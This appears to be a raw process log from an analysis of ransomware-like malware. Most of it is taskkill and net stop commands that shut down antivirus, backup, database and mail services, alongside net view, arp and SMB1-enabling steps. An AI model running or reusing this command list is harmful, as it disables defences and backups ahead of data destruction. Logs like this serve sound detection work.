C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mbamtray.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM infopath.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocomm.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM thebat64.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM dbeng50.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM tbirdconfig.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlwriter.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM CNTAoSMgr.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM excel.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM encsvc.exe /F
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EsgShKernel /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “aphidmonitorservice” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop CAARCUpdateSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EPUpdateService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ntrtscan /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sophos /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SAVService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop stc_raw_agent /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Symantec System Recovery” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CXDB /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SMTPSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos MCS Agent” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ShMonitor /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeIS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mssql$vim_sqlexp /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop zhudongfangyu /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop msftesql$PROD /y
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c net view
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" & Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop tmlisten /y
C:\Windows\SysWOW64\net.exe
net view
C:\Windows\SysWOW64\arp.exe
"arp" -a
C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.39
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop IISAdmin /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “SQL Backups /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Health Service” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeES /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SepMasterService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Acronis VSS Provider” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamMountSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AVP /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Web Control Service” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer110 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MySQL57 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop YooIT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Clean Service” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop CASAD2DWebSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Agent” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SstpSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop msexchangeadtopology /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeSRS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop veeam /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos File Scanner Service” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EraserSvc11710 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeMTA /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeMGMT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop DCAgent /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop msexchangeimap4 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “SQLsafe Filter Service” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop POP3Svc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop UI0Detect /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop W3Svc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeSA /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “SQLsafe Backup Service” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Device Control Service” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROD /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos MCS Client” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos System Protection Service” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop WRSVC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MBEndpointAgent /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MySQL80 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop unistoresvc_1af40a /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop NetMsmqActivator /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ARSM /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Smcinst /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TrueKeyScheduler /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sophossps /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SmcService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop svcGenericHost /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_filter /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_update_64 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_service /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_update /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TmCCSF /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLBrowser /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamRESTSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLSafeOLRService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TrueKey /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLSERVERAGENT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeEngineService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sms_site_sql_backup /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfevtp /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfemms /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop RESvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop wbengine /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop OracleClientCache80 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop wbengine /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfefire /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McTaskManager /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McShield /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SamSs /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeFramework /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Antivirus /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sacsvr /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SAVAdminService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Message Router” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer100 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop vapiendpoint /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Zoolz 2 Service” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Enterprise Client Service” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop macmnsvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamBackupSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ESHASRV /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop FA_Scheduler /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamBrokerSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SDRSVC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop kavfsslp /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLSERVER /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamCatalogSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop KAVFSGT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VSNAPVSS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MBAMService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamCloudSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop klnagent /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLWriter /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploySvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop masvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop KAVFS /y
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM steam.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM thebat.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM agntsvc.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM firefoxconfig.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqbcoreservice.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentAccelerator /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecVSSProvider /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop PDVFSService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop veeam /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamNFSSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop PDVFSService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop EsgShKernel /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$TPSAMA /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop ntrtscan /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop EPUpdateService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$TPS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop stc_raw_agent /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop zhudongfangyu /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop YooIT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EPSecurityService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mozyprobackup /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop DCAgent /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SHAREPOINT /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecVSSProvider /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop AVP /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SBSMONITORING /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SBSMONITORING /
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecRPCService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop Antivirus /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$PROFXENGAGEMENT /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecManagementService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop AcronisAgent /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$PROD /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecJobEngine /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Web Control Service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$PRACTTICEBGC /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecDeviceMediaService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos System Protection Service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$PRACTICEMGT /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentBrowser /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Safestore Service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop audioendpointbuilder /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$ECWDB2 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentAccelerator /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Message Router” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop unistoresvc_1af40a /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$BKUPEXEC /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop ARSM /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos MCS Client” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop msexchangeimap4 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “intel(r) proset monitoring service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSOLAP$TPSAMA /y
\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s FDResPub
C:\Windows\SysWOW64\net.exe
"net.exe" stop AcrSch2Svc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos MCS Agent” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop msexchangeadtopology /y
\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s upnphost
C:\Windows\SysWOW64\net.exe
"net.exe" stop “aphidmonitorservice” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSOLAP$TPS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Zoolz 2 Service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$TPSAMA /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Health Service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeSRS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop W3Svc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSOLAP$SYSTEM_BGC /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Veeam Backup Catalog Data Service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$TPS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos File Scanner Service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeSA /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop UI0Detect /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSOLAP$SQL_2008 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Symantec System Recovery” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$SYSTEM_BGC /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Device Control Service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeMTA /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SstpSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop msftesql$PROD /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “SQLsafe Filter Service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$SQL_2008 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SMTPSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Clean Service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeMGMT /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop POP3Svc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MsDtsServer110 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “SQLsafe Backup Service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SamSs /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos AutoUpdate Service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeIS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop NetMsmqActivator /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MsDtsServer100 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “SQL Backups /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Enterprise Client Service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop EraserSvc11710 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Agent” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeES /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop IISAdmin /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MsDtsServer /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Acronis VSS Provider” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop sophos /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop CAARCUpdateSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop CASAD2DWebSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop AcronisAgent /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop AcrSch2Svc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecRPCService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecManagementService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecJobEngine /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecDiveciMediaService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentBrowser /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop vapiendpoint /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop mssql$vim_sqlexp /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop WRSVC /y
